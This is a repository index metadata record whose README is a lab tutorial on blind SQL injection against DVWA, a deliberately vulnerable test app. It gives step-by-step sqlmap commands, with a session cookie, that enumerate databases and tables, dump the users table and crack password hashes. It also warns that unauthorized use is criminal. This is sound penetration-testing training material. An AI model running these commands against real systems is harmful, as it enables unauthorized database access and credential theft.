{"id":26833405,"url":"https://github.com/mr-won/sqlinjection_blind","last_synced_at":"2025-03-30T15:28:55.018Z","repository":{"id":277939524,"uuid":"933980559","full_name":"mr-won/SQLInjection_Blind","owner":"mr-won","description":"SQLInjection_Blind","archived":false,"fork":false,"pushed_at":"2025-03-07T01:44:49.000Z","size":4,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-18T02:27:15.285Z","etag":null,"topics":["igloocorporation","sqlinjection","sqlinjectionattack","sqlinjectionblind"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mr-won.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-17T04:28:39.000Z","updated_at":"2025-03-08T01:57:21.000Z","dependencies_parsed_at":"2025-03-18T02:27:19.800Z","dependency_job_id":"b4fb3eca-362c-4c60-9db0-9ff5724c2abe","html_url":"https://github.com/mr-won/SQLInjection_Blind","commit_stats":null,"previous_names":["chihyeonwon/sqlinjection_blind","mr-won/sqlinjection_blind"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind/manifes
ts","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mr-won","download_url":"https://codeload.github.com/mr-won/SQLInjection_Blind/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246337872,"owners_count":20761283,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["igloocorporation","sqlinjection","sqlinjectionattack","sqlinjectionblind"],"created_at":"2025-03-30T15:28:54.389Z","updated_at":"2025-03-30T15:28:54.994Z","avatar_url":"https://github.com/mr-won.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"## SQL Injection Attack (Blind)\nUsing this tool to attempt hacking against services you have not been authorized to test is a criminal act.  \nKeep in mind that the legal responsibility arising from any hacking attempt lies with the user who carried it out.  \nBlind SQL Injection, like Error-Based SQL Injection, is an attack that exploits a vulnerability in the target web page to send abnormal database queries.\n\nThis is the Blind SQL Injection assessment screen.  \nEnter a User ID value and check the URL: you will see the id value embedded in it, like http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\n\nFor the Blind SQL Injection assessment we will use a tool called SQLMap.  \n■ Burp Suite menu Extender + SQLMAP.exe installation  \nBefore extracting the database, run the command that tests for SQL Injection in order to confirm that the target has a SQL Injection vulnerability.  \nWhen running an automated SQL Injection attack, information is extracted in the order [vulnerability check -\u003e DB -\u003e tables -\u003e columns].\n\nI used sqlmap, which is written in Python. Entering sqlmap.py -h shows sqlmap's help.\n\nFinding DB information  \nBasic command format: sqlmap.py -u URL --dbs  \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" --dbs\n\nFinding table information  \nBasic command format: sqlmap.py -u URL -D (database) --tables  \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" -D dvwa --tables\n\nExtracting column information  \nBasic command format: sqlmap.py -u URL -T (table) --columns  \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" -D dvwa -T users --columns\n\nExtracting database account information  \nBasic command format: sqlmap.py -u URL -C (columns) --dump  \nBasic command format: sqlmap.py -u URL -D (database name) -T (table) --dump  \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" -D dvwa -T users --dump  \nWhen the last command asks whether to crack the hashes, choose Y. You can then see the account information and passwords being exposed indiscriminately.\n\n\n## More Information\nhttp://www.securiteam.com/securityreviews/5DP0N1P76E.html\nhttps://en.wikipedia.org/wiki/SQL_injection\nhttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/\nhttp://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet\nhttps://owasp.org/www-community/attacks/Blind_SQL_Injection\nhttp://bobby-tables.com/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-won%2Fsqlinjection_blind","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmr-won%2Fsqlinjection_blind","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-won%2Fsqlinjection_blind/lists"}